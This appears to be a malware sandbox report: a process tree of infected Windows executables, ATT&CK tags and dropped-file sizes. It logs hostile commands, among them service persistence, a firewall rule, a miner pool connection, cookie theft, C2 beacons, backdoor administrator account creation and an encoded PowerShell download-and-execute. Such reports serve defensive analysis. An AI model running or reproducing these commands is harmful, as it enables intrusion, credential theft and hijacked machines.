C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\klqkfbne\2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\oxrwonie.exe" C:\Windows\SysWOW64\klqkfbne\2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create klqkfbne binPath= "C:\Windows\SysWOW64\klqkfbne\oxrwonie.exe /d\"C:\Users\Admin\AppData\Local\Temp\D84E.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description klqkfbne "wifi internet conection"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start klqkfbne2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\F240.exeC:\Users\Admin\AppData\Local\Temp\F240.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7CC.exeC:\Users\Admin\AppData\Local\Temp\7CC.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7CC.exeC:\Users\Admin\AppData\Local\Temp\7CC.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\13E3.exeC:\Users\Admin\AppData\Local\Temp\13E3.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
-
-
C:\Windows\SysWOW64\klqkfbne\oxrwonie.exeC:\Windows\SysWOW64\klqkfbne\oxrwonie.exe /d"C:\Users\Admin\AppData\Local\Temp\D84E.exe"1⤵
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\2691.exeC:\Users\Admin\AppData\Local\Temp\2691.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7B3A.exeC:\Users\Admin\AppData\Local\Temp\7B3A.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7B3A.exe"C:\Users\Admin\AppData\Local\Temp\7B3A.exe"2⤵
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\9683.exeC:\Users\Admin\AppData\Local\Temp\9683.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HSN7T.tmp\9683.tmp"C:\Users\Admin\AppData\Local\Temp\is-HSN7T.tmp\9683.tmp" /SL5="$704CC,300262,216576,C:\Users\Admin\AppData\Local\Temp\9683.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4BQL1.tmp\ST.exe"C:\Users\Admin\AppData\Local\Temp\is-4BQL1.tmp\ST.exe" /S /UID=lab2123⤵
-
C:\Users\Admin\AppData\Local\Temp\CAVXSGMRQH\prolab.exe"C:\Users\Admin\AppData\Local\Temp\CAVXSGMRQH\prolab.exe" /VERYSILENT4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UPG6F.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-UPG6F.tmp\prolab.tmp" /SL5="$203D8,575243,216576,C:\Users\Admin\AppData\Local\Temp\CAVXSGMRQH\prolab.exe" /VERYSILENT5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\40-585a9-3af-2b7a4-2dbb5a9a42a55\Hitaelyhyde.exe"C:\Users\Admin\AppData\Local\Temp\40-585a9-3af-2b7a4-2dbb5a9a42a55\Hitaelyhyde.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ypq4ivwd.hag\joggaplayer.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\ypq4ivwd.hag\joggaplayer.exeC:\Users\Admin\AppData\Local\Temp\ypq4ivwd.hag\joggaplayer.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nnnoo03q.10x\proxybot.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\nnnoo03q.10x\proxybot.exeC:\Users\Admin\AppData\Local\Temp\nnnoo03q.10x\proxybot.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"7⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4q12zlcg.5b3\ra4vpn.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\4q12zlcg.5b3\ra4vpn.exeC:\Users\Admin\AppData\Local\Temp\4q12zlcg.5b3\ra4vpn.exe6⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\AFD9.exeC:\Users\Admin\AppData\Local\Temp\AFD9.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\9D13.tmp.exeC:\Users\Admin\AppData\Local\Temp\9D13.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\C703.tmp.exeC:\Users\Admin\AppData\Local\Temp\C703.tmp.exe1⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"2⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" os get caption /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get caption /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get StatusCode /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get ResponseTime /FORMAT:List3⤵
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"3⤵
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\1.log"3⤵
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\4.log"3⤵
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\2.log"3⤵
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\3.log"3⤵
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/VisitTimeFilterType 2 /VisitTimeFilterValue 6 /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\6.log"3⤵
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://185.193.88.150/gag/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*bdf1834f8a4674c12a953d64c494efa43⤵
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://185.193.88.150/gag/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*bdf1834f8a4674c12a953d64c494efa43⤵
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://185.193.88.150/gag/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*bdf1834f8a4674c12a953d64c494efa43⤵
-
C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
-
-
C:\Program Files (x86)\Windows Media Player\wmpconfig.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6992 -s 885⤵
- Program crash
-
-
-
C:\Program Files (x86)\Internet Explorer\ieinstal.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
-
-
C:\Program Files (x86)\Picture Lab\unins000.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
-
-
C:\Program Files (x86)\JCleaner\unins000.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
-
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://185.193.88.150/gag/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*bdf1834f8a4674c12a953d64c494efa43⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 5444⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://185.193.88.150/gag/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*bdf1834f8a4674c12a953d64c494efa43⤵
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://185.193.88.150/gag/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*bdf1834f8a4674c12a953d64c494efa43⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scookiestxt C:\Users\Admin\AppData\Roaming\EdgeCP\edge_cookies.cookies4⤵
-
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://185.193.88.150/gag/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*bdf1834f8a4674c12a953d64c494efa43⤵
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://185.193.88.150/gag/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*bdf1834f8a4674c12a953d64c494efa43⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scookiestxt C:\Users\Admin\AppData\Roaming\EdgeCP\chrome_cookies.cookies4⤵
-
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://185.193.88.150/gag/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*bdf1834f8a4674c12a953d64c494efa43⤵
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://185.193.88.150/gag/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*bdf1834f8a4674c12a953d64c494efa43⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get StatusCode /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get ResponseTime /FORMAT:List3⤵
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get StatusCode /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get ResponseTime /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get StatusCode /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get ResponseTime /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get StatusCode /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get ResponseTime /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get StatusCode /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get ResponseTime /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get StatusCode /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get ResponseTime /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get StatusCode /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get ResponseTime /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get StatusCode /FORMAT:List3⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='185.193.88.150' get ResponseTime /FORMAT:List3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\D55C.tmp.exeC:\Users\Admin\AppData\Local\Temp\D55C.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\EDC7.tmp.exeC:\Users\Admin\AppData\Local\Temp\EDC7.tmp.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\78E1.exeC:\Users\Admin\AppData\Local\Temp\78E1.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\9851.exeC:\Users\Admin\AppData\Local\Temp\9851.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\D74F.exeC:\Users\Admin\AppData\Local\Temp\D74F.exe1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\3dc3cbd0283c4d7aacda9fa99b54ee11 /t 5408 /p 62561⤵
-
C:\Users\Admin\AppData\Local\Temp\B70.exeC:\Users\Admin\AppData\Local\Temp\B70.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 12042⤵
- Program crash
-
-
C:\Users\Admin\AppData\Roaming\atcgjbcC:\Users\Admin\AppData\Roaming\atcgjbc1⤵
-
C:\Users\Admin\AppData\Roaming\atcgjbcC:\Users\Admin\AppData\Roaming\atcgjbc2⤵
-
-
C:\Users\Admin\AppData\Roaming\ffcgjbcC:\Users\Admin\AppData\Roaming\ffcgjbc1⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\ijcgjbcC:\Users\Admin\AppData\Roaming\ijcgjbc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 48fDf3kZ /add1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 48fDf3kZ /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 48fDf3kZ /add3⤵
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD3⤵
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 48fDf3kZ1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 48fDf3kZ2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 48fDf3kZ3⤵
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2136 -s 33802⤵
- Program crash
-
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Roaming\atcgjbcC:\Users\Admin\AppData\Roaming\atcgjbc1⤵
-
C:\Users\Admin\AppData\Roaming\atcgjbcC:\Users\Admin\AppData\Roaming\atcgjbc2⤵
-
-
C:\Users\Admin\AppData\Roaming\ffcgjbcC:\Users\Admin\AppData\Roaming\ffcgjbc1⤵
-
C:\Users\Admin\AppData\Roaming\ijcgjbcC:\Users\Admin\AppData\Roaming\ijcgjbc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4308 -s 32642⤵
- Program crash
-
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Roaming\atcgjbcC:\Users\Admin\AppData\Roaming\atcgjbc1⤵
-
C:\Users\Admin\AppData\Roaming\ffcgjbcC:\Users\Admin\AppData\Roaming\ffcgjbc1⤵
-
C:\Users\Admin\AppData\Roaming\ijcgjbcC:\Users\Admin\AppData\Roaming\ijcgjbc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Account Manipulation
1Bootkit
1Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Impair Defenses
1Install Root Certificate
1Modify Registry
5Scripting
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
24KB
-
Filesize
24KB
-
Filesize
20KB
-
Filesize
36KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
48KB
-
Filesize
48KB
-
Filesize
48KB
-
Filesize
8.1MB
-
Filesize
156KB
-
Filesize
544KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4.6MB
-
Filesize
412KB
-
Filesize
644KB
-
Filesize
4KB
-
Filesize
4.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
212KB
-
Filesize
8KB
-
Filesize
4.4MB
-
Filesize
632KB
-
Filesize
164KB
-
Filesize
224KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
876KB
-
Filesize
4.7MB
-
Filesize
4KB
-
Filesize
716KB
-
Filesize
4.8MB
-
Filesize
4.5MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
684KB
-
Filesize
684KB
-
Filesize
240KB
-
Filesize
172KB
